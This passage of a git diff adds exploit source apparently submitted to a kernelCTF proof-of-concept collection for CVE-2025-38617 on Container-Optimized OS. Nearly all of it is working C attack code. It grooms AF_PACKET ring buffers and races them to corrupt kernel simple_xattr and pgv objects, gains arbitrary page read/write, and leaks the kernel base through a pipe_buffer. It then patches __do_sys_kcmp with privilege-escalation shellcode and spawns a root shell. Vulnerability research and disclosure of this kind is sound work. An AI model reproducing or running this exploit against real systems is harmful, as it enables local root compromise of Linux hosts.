pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE; + + printf("[DEBUG] pages_order2_read_primitive->overflowed_simple_xattr_kernel_address: 0x%016lx\n", pages_order2_read_primitive->overflowed_simple_xattr_kernel_address); + printf("[DEBUG] pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address: 0x%016lx\n", pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address); + + 
free(leak_data); + return true; +} + +void simple_xattr_read_write_primitive_init(struct simple_xattr_read_write_primitive *primitive) +{ + primitive->drain_pages_order2_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_1 = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_2 = Socket(AF_PACKET, SOCK_RAW, 0); + + for (int i = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets); i++) + primitive->spray_pg_vec_packet_sockets[i] = Socket(AF_PACKET, SOCK_RAW, 0); + + primitive->overflowed_pg_vec_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + struct tpacket_req3 tx_ring = {}; + tx_ring.tp_block_size = PAGES_ORDER1_SIZE; + tx_ring.tp_block_nr = 1; + tx_ring.tp_frame_size = PAGES_ORDER1_SIZE; + tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr; + + struct tpacket_req3 rx_ring = {}; + rx_ring.tp_block_size = PAGES_ORDER3_SIZE; + rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16; + rx_ring.tp_frame_size = PAGES_ORDER3_SIZE; + rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr; + rx_ring.tp_sizeof_priv = 16248; + rx_ring.tp_retire_blk_tov = USHRT_MAX; + + struct sock_filter filter[MAX_FILTER_LEN] = {}; + for (int i = 0; i < MAX_FILTER_LEN - 1; i++) { + filter[i].code = BPF_LD | BPF_IMM; + filter[i].k = 0xcafebabe; // Any value will work + } + + filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K; + filter[MAX_FILTER_LEN - 1].k = sizeof(void *); + + primitive->victim_packet_socket_config = victim_packet_socket_config_create( + (struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo + (struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr + tx_ring, // tx_ring + rx_ring, // rx_ring + 1, // packet_loss + TPACKET_V3, // packet_version + 30, // packet_reserve + filter // filter + ); +} + +void 
simple_xattr_read_write_primitive_page_drain(struct simple_xattr_read_write_primitive *primitive) +{ + alloc_pages(primitive->drain_pages_order2_packet_socket, 256, PAGES_ORDER2_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_1, 128, PAGES_ORDER3_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_2, 128, PAGES_ORDER3_SIZE); +} + +void simple_xattr_read_write_primitive_setup_pg_vec(struct simple_xattr_read_write_primitive *primitive) +{ + free_pages(primitive->drain_pages_order3_packet_socket_1); + + for (int i = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets); i++) { + alloc_pages(primitive->spray_pg_vec_packet_sockets[i], MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE); + primitive->spray_pg_vec_packet_sockets_state[i] = 1; + } + + for (int i = 64, free_count = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets) && free_count < 6; i += 16, free_count++) { + free_pages(primitive->spray_pg_vec_packet_sockets[i]); + primitive->spray_pg_vec_packet_sockets_state[i] = 0; + } +} + +void simple_xattr_read_write_primitive_page_drain_cleanup(struct simple_xattr_read_write_primitive *primitive) +{ + free_pages(primitive->drain_pages_order2_packet_socket); + free_pages(primitive->drain_pages_order3_packet_socket_2); +} + +void simple_xattr_read_write_primitive_pg_vec_cleanup(struct simple_xattr_read_write_primitive *primitive) +{ + for (int i = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets); i++) { + if (primitive->spray_pg_vec_packet_sockets_state[i] && primitive->spray_pg_vec_packet_sockets[i] != -1) { + free_pages(primitive->spray_pg_vec_packet_sockets[i]); + primitive->spray_pg_vec_packet_sockets_state[i] = 0; + } + } +} + +void simple_xattr_read_write_primitive_main_work( + struct simple_xattr_read_write_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec 
decrease_tpacket_rcv_thread_sleep_time, + u64 simple_xattr_kernel_address +) +{ + u8 packet_data[128] = {}; + int dummy_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME); + *(u64 *)(packet_data) = simple_xattr_kernel_address; + + struct pg_vec_lock_thread_work *pg_vec_lock_thread_work = NULL; + struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work = NULL; + struct tpacket_rcv_thread_work *tpacket_rcv_thread_work = NULL; + struct tpacket_rcv_thread_work_result *tpacket_rcv_thread_work_result = NULL; + struct msghdr *msghdr = NULL; + + struct victim_packet_socket_config *victim_packet_socket_config = primitive->victim_packet_socket_config; + struct timespec pg_vec_lock_timeout = { + .tv_sec = victim_packet_socket_config->sndtimeo.tv_sec, + .tv_nsec = victim_packet_socket_config->sndtimeo.tv_usec * NSEC_PER_USEC + }; + + struct victim_packet_socket *victim_packet_socket = victim_packet_socket_create(victim_packet_socket_config); + pg_vec_lock_thread_work = pg_vec_lock_thread_work_create(victim_packet_socket, dummy_ifindex); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(victim_packet_socket, true, false); + msghdr = msghdr_create(packet_data, sizeof(packet_data), DUMMY_INTERFACE_NAME); + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + simple_xattr_read_write_primitive_page_drain(primitive); + victim_packet_socket_configure(victim_packet_socket); + simple_xattr_read_write_primitive_setup_pg_vec(primitive); + pg_vec_lock_thread_send_work(necessary_threads->pg_vec_lock_thread, pg_vec_lock_thread_work); + struct timespec pg_vec_lock_acquire_time = pg_vec_lock_thread_wait_in_work(necessary_threads->pg_vec_lock_thread); + network_interface_down(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_in_work(necessary_threads->pg_vec_buffer_thread); + network_interface_up(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + 
struct timespec pg_vec_lock_release_time = timespec_add(pg_vec_lock_acquire_time, pg_vec_lock_timeout); + + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct itimerspec settime_value = {}; + settime_value.it_value = timespec_add(pg_vec_lock_release_time, timer_interrupt_amplitude); + Timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &settime_value, NULL); + + tpacket_rcv_thread_work = tpacket_rcv_thread_work_create(pg_vec_lock_release_time, decrease_tpacket_rcv_thread_sleep_time, msghdr); + tpacket_rcv_thread_send_work(necessary_threads->tpacket_rcv_thread, tpacket_rcv_thread_work); + tpacket_rcv_thread_wait_work_complete(necessary_threads->tpacket_rcv_thread); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + pg_vec_lock_thread_wait_work_complete(necessary_threads->pg_vec_lock_thread); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(NULL, false, true); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + victim_packet_socket_destroy(victim_packet_socket); +} + +bool simple_xattr_read_write_primitive_build_primitive( + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +) +{ + simple_xattr_read_write_primitive_main_work( + simple_xattr_read_write_primitive, + necessary_threads, + timerfd, + configure_network_interface_socket, + timer_interrupt_amplitude, + decrease_tpacket_rcv_thread_sleep_time, + pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address + ); + + bool overflow_success = false; + for (int i = 0; i < 
ARRAY_SIZE(simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets) && !overflow_success; i++) { + if (simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets_state[i] == 0) + continue; + + u64 mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + void *mem = Mmap( + NULL, + mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i], + 0 + ); + + struct simple_xattr *simple_xattr = mem + 3 * PAGE_SIZE; + if (is_data_look_like_simple_xattr(simple_xattr, KMALLOC_8K_SIZE)) { + simple_xattr_dump(simple_xattr); + simple_xattr_read_write_primitive->overflowed_pg_vec_packet_socket = simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i]; + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i] = -1; + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets_state[i] = 0; + simple_xattr_read_write_primitive->manipulated_simple_xattr_request = pages_order2_read_primitive->leaked_content_simple_xattr_request; + pages_order2_read_primitive->leaked_content_simple_xattr_request = NULL; + overflow_success = true; + } + + Munmap(mem, mmap_size); + } + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + simple_xattr_read_write_primitive_page_drain_cleanup(simple_xattr_read_write_primitive); + simple_xattr_read_write_primitive_pg_vec_cleanup(simple_xattr_read_write_primitive); + + if (overflow_success) { + for (int i = 0; i < ARRAY_SIZE(simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets); i++) { + if (simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i] != -1) { + Close(simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i]); + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i] = -1; + } + } + } + + return overflow_success; +} + +struct simple_xattr *simple_xattr_read_write_primitive_mmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive) +{ + u64 mmap_size = 
MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + simple_xattr_read_write_primitive->mmap_address = Mmap( + NULL, + mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + simple_xattr_read_write_primitive->overflowed_pg_vec_packet_socket, + 0 + ); + + struct simple_xattr *simple_xattr = simple_xattr_read_write_primitive->mmap_address + 3 * PAGE_SIZE; + return simple_xattr; + +} + +void simple_xattr_read_write_primitive_munmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive) +{ + u64 mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + Munmap(simple_xattr_read_write_primitive->mmap_address, mmap_size); + simple_xattr_read_write_primitive->mmap_address = NULL; +} + +void abr_page_read_write_primitive_build_primitive( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_primitive +) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + Removexattr( + pages_order2_read_primitive->overflowed_simple_xattr_request->filepath, + pages_order2_read_primitive->overflowed_simple_xattr_request->name + ); + + simple_xattr_request_destroy(pages_order2_read_primitive->overflowed_simple_xattr_request); + pages_order2_read_primitive->overflowed_simple_xattr_request = NULL; + + ssize_t getxattr_ret = 0; + u8 value_set[XATTR_SIZE_MAX] = {}; + u8 value_get[XATTR_SIZE_MAX] = {}; + struct simple_xattr *manipulated_simple_xattr = simple_xattr_read_write_primitive_mmap(simple_xattr_read_write_primitive); + u64 original_manipulated_simple_xattr_name_pointer = (u64)(manipulated_simple_xattr->name); + u64 original_manipulated_simple_xattr_list_next_pointer = (u64)(manipulated_simple_xattr->list.next); + u64 fake_simple_xattr_name_addr = 0; + u64 fake_simple_xattr_addr = 0; + int overwritten_pg_vec_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + bool abr_page_read_write_primitive_build_success = 
false; + + while (!abr_page_read_write_primitive_build_success) { + bool fake_simple_xattr_name_success = false; + int fake_simple_xattr_name_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + while (!fake_simple_xattr_name_success) { + Setxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR_NAME__SIMPLE_XATTR_NAME, + value_set, + KMALLOC_8K_SIZE, + XATTR_CREATE + ); + + fake_simple_xattr_name_addr = (u64)manipulated_simple_xattr->list.prev; + fprintf(stderr, "fake_simple_xattr_name_addr: 0x%016lx\n", fake_simple_xattr_name_addr); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR_NAME__SIMPLE_XATTR_NAME + ); + + alloc_pages(fake_simple_xattr_name_packet_socket, 1, PAGES_ORDER2_SIZE); + void *mem = Mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0); + strcpy(mem, FAKE_SIMPLE_XATTR_NAME); + Munmap(mem, 1 * PAGES_ORDER2_SIZE); + manipulated_simple_xattr->name = (char *)(fake_simple_xattr_name_addr); + + getxattr_ret = getxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + FAKE_SIMPLE_XATTR_NAME, + value_get, + manipulated_simple_xattr->size + ); + + if (getxattr_ret == manipulated_simple_xattr->size) { + fake_simple_xattr_name_success = true; + } + + manipulated_simple_xattr->name = (char *)original_manipulated_simple_xattr_name_pointer; + + if (!fake_simple_xattr_name_success) { + free_pages(fake_simple_xattr_name_packet_socket); + } + } + + fprintf(stderr, "fake_simple_xattr_name_success\n"); + + bool fake_simple_xattr_success = false; + int fake_simple_xattr_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + while (!fake_simple_xattr_success) { + Setxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR__SIMPLE_XATTR_NAME, + 
value_set, + KMALLOC_8K_SIZE, + XATTR_CREATE + ); + + fake_simple_xattr_addr = (u64)manipulated_simple_xattr->list.prev; + fprintf(stderr, "fake_simple_xattr_addr: 0x%016lx\n", fake_simple_xattr_addr); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR__SIMPLE_XATTR_NAME + ); + + alloc_pages(fake_simple_xattr_packet_socket, 1, PAGES_ORDER2_SIZE); + void *mem = Mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0); + strcpy(mem, DETECT_FAKE_SIMPLE_XATTR_RECLAIMATION); + + manipulated_simple_xattr->name = (void *)fake_simple_xattr_addr; + getxattr_ret = getxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + DETECT_FAKE_SIMPLE_XATTR_RECLAIMATION, + value_get, + manipulated_simple_xattr->size + ); + + if (getxattr_ret == manipulated_simple_xattr->size) { + memset(mem, 0, 1 * PAGES_ORDER2_SIZE); + struct simple_xattr *fake_simple_xattr = mem; + fake_simple_xattr->list.next = (void *)fake_simple_xattr_addr; + fake_simple_xattr->list.prev = (void *)fake_simple_xattr_addr; + fake_simple_xattr->name = (void *)fake_simple_xattr_name_addr; + fake_simple_xattr->size = KMALLOC_8K_SIZE; + + manipulated_simple_xattr->list.next = (void *)fake_simple_xattr_addr; + fake_simple_xattr_success = true; + } else { + free_pages(fake_simple_xattr_packet_socket); + } + + Munmap(mem, 1 * PAGES_ORDER2_SIZE); + manipulated_simple_xattr->name = (void *)original_manipulated_simple_xattr_name_pointer; + } + + fprintf(stderr, "fake_simple_xattr_success\n"); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + FAKE_SIMPLE_XATTR_NAME + ); + + alloc_pages(overwritten_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE); + void *mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0); + void 
*mem1 = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0); + struct pgv *pgv = NULL; + + if (mem != MAP_FAILED && is_data_look_like_pgv(mem, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2)) { + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec = fake_simple_xattr_name_packet_socket; + pgv = mem; + abr_page_read_write_primitive->original_buffer_page_addr = (u64)(pgv[0].buffer); + abr_page_read_write_primitive_build_success = true; + } else if (mem1 != MAP_FAILED && is_data_look_like_pgv(mem1, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2)) { + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec = fake_simple_xattr_packet_socket; + pgv = mem1; + abr_page_read_write_primitive->original_buffer_page_addr = (u64)(pgv[0].buffer); + abr_page_read_write_primitive_build_success = true; + } + + if (mem != MAP_FAILED) + Munmap(mem, 1 * PAGES_ORDER2_SIZE); + + if (mem1 != MAP_FAILED) + Munmap(mem1, 1 * PAGES_ORDER2_SIZE); + + if (abr_page_read_write_primitive_build_success) { + abr_page_read_write_primitive->packet_socket_with_overwritten_pg_vec = overwritten_pg_vec_packet_socket; + abr_page_read_write_primitive->overwrite_pg_vec_mmap_size = 1 * PAGES_ORDER2_SIZE; + abr_page_read_write_primitive->overwritten_pg_vec_mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + } else { + free_pages(overwritten_pg_vec_packet_socket); + } + } + + manipulated_simple_xattr->list.next = (void *)original_manipulated_simple_xattr_list_next_pointer; + simple_xattr_read_write_primitive_munmap(simple_xattr_read_write_primitive); +} + +struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct pages_order2_read_primitive *pages_order2_read_primitive +) +{ + struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive = {}; + 
simple_xattr_read_write_primitive_init(&simple_xattr_read_write_primitive); + + struct timespec simple_xattr_read_write_primitive_sleep_decrease_amplitude = { .tv_nsec = 15000 }; + struct timespec simple_xattr_read_write_primitive_timer_interrupt_amplitude = { .tv_nsec = 160000 }; + + bool simple_xattr_read_write_primitive_build_success = false; + while (!simple_xattr_read_write_primitive_build_success) { + simple_xattr_read_write_primitive_build_success = simple_xattr_read_write_primitive_build_primitive( + &simple_xattr_read_write_primitive, + pages_order2_read_primitive, + necessary_threads, + timerfd, + configure_network_interface_socket, + simple_xattr_read_write_primitive_sleep_decrease_amplitude, + simple_xattr_read_write_primitive_timer_interrupt_amplitude + ); + } + + return simple_xattr_read_write_primitive; +} + +void *abr_page_read_write_primitive_mmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + u64 page_aligned_addr_to_mmap +) +{ + if (page_aligned_addr_to_mmap & (PAGE_SIZE - 1)) { + fprintf(stderr, "[abr_page_read_write_primitive_mmap]: page_aligned_addr_to_mmap is not page aligned\n"); + return NULL; + } + + void *mem = Mmap( + NULL, + abr_page_read_write_primitive->overwrite_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec, + 0 + ); + + struct pgv *pgv = mem; + pgv[0].buffer = (char *)page_aligned_addr_to_mmap; + Munmap(mem, abr_page_read_write_primitive->overwrite_pg_vec_mmap_size); + + mem = mmap( + NULL, + abr_page_read_write_primitive->overwritten_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_with_overwritten_pg_vec, + 0 + ); + + if (mem == MAP_FAILED) + return NULL; + + return mem; +} + +void abr_page_read_write_primitive_munmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + void *mem +) +{ + Munmap(mem, 
abr_page_read_write_primitive->overwritten_pg_vec_mmap_size); + mem = Mmap( + NULL, + abr_page_read_write_primitive->overwrite_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec, + 0 + ); + + struct pgv *pgv = mem; + pgv[0].buffer = (char *)abr_page_read_write_primitive->original_buffer_page_addr; + Munmap(mem, abr_page_read_write_primitive->overwrite_pg_vec_mmap_size); +} + +void *patch_sys_kcmp(struct abr_page_read_write_primitive *abr_page_read_write_primitive) +{ + u64 sys_kcmp_page = __do_sys_kcmp & PAGE_MASK; + u64 sys_kcmp_offset_from_page = __do_sys_kcmp - sys_kcmp_page; + + void *m = abr_page_read_write_primitive_mmap( + abr_page_read_write_primitive, + sys_kcmp_page + ); + + /* abr_page_read_write_primitive_mmap() returns NULL when the mapping fails */ + if (m == NULL) { + fprintf(stderr, "[patch_sys_kcmp]: failed to mmap the page containing __do_sys_kcmp\n"); + exit(EXIT_FAILURE); + } + + void *overwrite_ptr = m + sys_kcmp_offset_from_page; + void *shellcode = (void *)privilege_escalation_shellcode_begin; + int shellcode_length = (void *)privilege_escalation_shellcode_end - (void *)privilege_escalation_shellcode_begin; + void *saved_opcodes = Calloc(1, shellcode_length); + memcpy(saved_opcodes, overwrite_ptr, shellcode_length); + memcpy(overwrite_ptr, shellcode, shellcode_length); + + abr_page_read_write_primitive_munmap(abr_page_read_write_primitive, m); + return saved_opcodes; +} + +u64 find_kernel_base( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive +) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct simple_xattr *manipulated_simple_xattr = simple_xattr_read_write_primitive_mmap(simple_xattr_read_write_primitive); + + u64 kernel_base = 0; + bool found_pipe_buffer = false; + + while (!found_pipe_buffer) { + int pipe_fd[2] = {}; + Pipe2(pipe_fd, O_DIRECT); + + u8 value[XATTR_SIZE_MAX] = {}; + Setxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAKED_PAGES_ORDER2_ADDRESS_FOR_PIPE_BUFFER_SIMPLE_XATTR_NAME, + value, + KMALLOC_8K_SIZE, + XATTR_CREATE + ); +
+ u64 pipe_buffer_addr = (u64)manipulated_simple_xattr->list.prev; + fprintf(stderr, "pipe_buffer_addr: 0x%016lx\n", pipe_buffer_addr); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAKED_PAGES_ORDER2_ADDRESS_FOR_PIPE_BUFFER_SIMPLE_XATTR_NAME + ); + + Fcntl(pipe_fd[0], F_SETPIPE_SZ, PAGE_COUNT_TO_ALLOCATE_PIPE_BUFFER_ON_PAGES_ORDER2 * PAGE_SIZE); + Write(pipe_fd[1], DATA_TO_TRIGGER_PIPE_BUFFER_FILLIN, strlen(DATA_TO_TRIGGER_PIPE_BUFFER_FILLIN)); + + void *mem = abr_page_read_write_primitive_mmap(abr_page_read_write_primitive, pipe_buffer_addr); + if (mem != NULL) { + if (is_data_look_like_pipe_buffer(mem)) { + struct pipe_buffer *pipe_buffer = mem; + kernel_base = (u64)pipe_buffer->ops - anon_pipe_buf_ops_offset_from_kernel_base; + found_pipe_buffer = true; + } + + abr_page_read_write_primitive_munmap(abr_page_read_write_primitive, mem); + } + + Close(pipe_fd[0]); + Close(pipe_fd[1]); + } + + simple_xattr_read_write_primitive_munmap(simple_xattr_read_write_primitive); + return kernel_base; +} + +int main(void) +{ + setup_nofile_rlimit(); + setup_namespace(); + setup_tmpfs(); + + int timerfd = Timerfd_create(CLOCK_MONOTONIC, 0); + struct necessary_threads *necessary_threads = necessary_threads_create(timerfd); + + dummy_network_interface_create(DUMMY_INTERFACE_NAME, IPV6_MIN_MTU - 1); + int configure_network_interface_socket = Socket(AF_INET, SOCK_DGRAM, IPPROTO_IP); + network_interface_up(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + + struct pages_order2_read_primitive pages_order2_read_primitive = pages_order2_read_primitive_build( + necessary_threads, + configure_network_interface_socket, + timerfd + ); + + fprintf(stderr, "pages_order2_read_primitive build success\n"); + + struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive = simple_xattr_read_write_primitive_build( + necessary_threads, + configure_network_interface_socket, + timerfd, + &pages_order2_read_primitive + ); 
+ + fprintf(stderr, "simple_xattr_read_write_primitive build success\n"); + + struct abr_page_read_write_primitive abr_page_read_write_primitive = {}; + abr_page_read_write_primitive_build_primitive( + &abr_page_read_write_primitive, + &simple_xattr_read_write_primitive, + &pages_order2_read_primitive + ); + + fprintf(stderr, "abr_page_read_write_primitive_build_primitive success\n"); + + u64 kernel_base = find_kernel_base(&abr_page_read_write_primitive, &simple_xattr_read_write_primitive); + fprintf(stderr, "[+] kernel base: 0x%016lx\n", kernel_base); + update_kernel_address(kernel_base); + void *sys_kcmp_saved_opcodes = patch_sys_kcmp(&abr_page_read_write_primitive); + + int not_used = -1; + syscall(SYS_kcmp, (u32)(init_cred >> 32), (u32)(init_cred), not_used, init_fs, __x86_return_thunk); + + char *sh_args[] = {"sh", NULL}; + execve("/bin/sh", sh_args, NULL); +} diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.h b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.h new file mode 100644 index 000000000..30b80f7ce --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.h @@ -0,0 +1,678 @@ +#ifndef EXPLOIT_H +#define EXPLOIT_H + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef int64_t s64; +typedef uint64_t u64; +typedef uint32_t u32; +typedef uint16_t u16; +typedef uint8_t u8; + +struct pgv { + char *buffer; +}; + +static_assert(sizeof(struct pgv) == 8, "sizeof(struct pgv) not match with kernel"); + +static inline bool is_data_look_like_pgv(struct 
pgv *pgv, size_t count) +{ + bool is_pgv = true; + + for (size_t i = 0; i < count && is_pgv; i++) { + u64 kernel_page_addr = (u64)(pgv[i].buffer); + if ((kernel_page_addr >> 48) != 0xFFFF) + is_pgv = false; + } + + return is_pgv; +} + +static inline void pgv_dump(struct pgv *pgv, size_t len) +{ + for (size_t i = 0; i < len; i++) { + printf("pgv[%zu] = 0x%016lx\n", i, (u64)(pgv[i].buffer)); + } +} + +struct list_head { + struct list_head *next; + struct list_head *prev; +}; + +static_assert(sizeof(struct list_head) == 16, "sizeof(struct list_head) not match with kernel"); + +struct simple_xattr { + struct list_head list; + char *name; + size_t size; + char value[]; +}; + +static_assert(sizeof(struct simple_xattr) == 32, "sizeof(struct simple_xattr) not match with kernel"); + +#define UNUSED_FUNCTION_PARAMETER(x) (void)(x) +#define ARRAY_SIZE(arr) (sizeof(arr) / sizeof((arr)[0])) + +#define KMALLOC_8K_SIZE 8192 +#define KMALLOC_8_SIZE 8 +#define PAGE_SIZE 4096UL +#define PAGE_MASK (~(PAGE_SIZE - 1)) +#define PAGES_ORDER1_SIZE (PAGE_SIZE * 2) +#define PAGES_ORDER2_SIZE (PAGE_SIZE * 4) +#define PAGES_ORDER3_SIZE (PAGE_SIZE * 8) +#define PAGES_ORDER4_SIZE (PAGE_SIZE * 16) +#define PAGES_ORDER5_SIZE (PAGE_SIZE * 32) +#define CPU_NUMBER_ZERO 0 +#define CPU_NUMBER_ONE 1 +#define NSEC_PER_SEC 1000000000L +#define NSEC_PER_USEC 1000L +#define USEC_PER_SEC 1000000L +#define TOTAL_TIMERFD_WAITLIST_THREADS 180 + +#define MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 ((KMALLOC_8K_SIZE / sizeof(struct pgv)) + 1) +#define MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16 ((KMALLOC_8_SIZE / sizeof(struct pgv)) + 1) + +#define PAGE_COUNT_TO_ALLOCATE_PIPE_BUFFER_ON_PAGES_ORDER2 256 +#define DATA_TO_TRIGGER_PIPE_BUFFER_FILLIN "fillin_pipe_buffer" + +#define MAX_FILTER_LEN 700 +#define MAX_NICE 19 + +#define TMPFS_MOUNT_POINT "/tmp/tmpfs" +#define DUMMY_INTERFACE_NAME "pwn_dummy" + +#define __rb_parent(pc) ((struct rb_node *)((pc) & ~3)) + +u64 anon_pipe_buf_ops_last_24_bits = 0xc22580; +u64
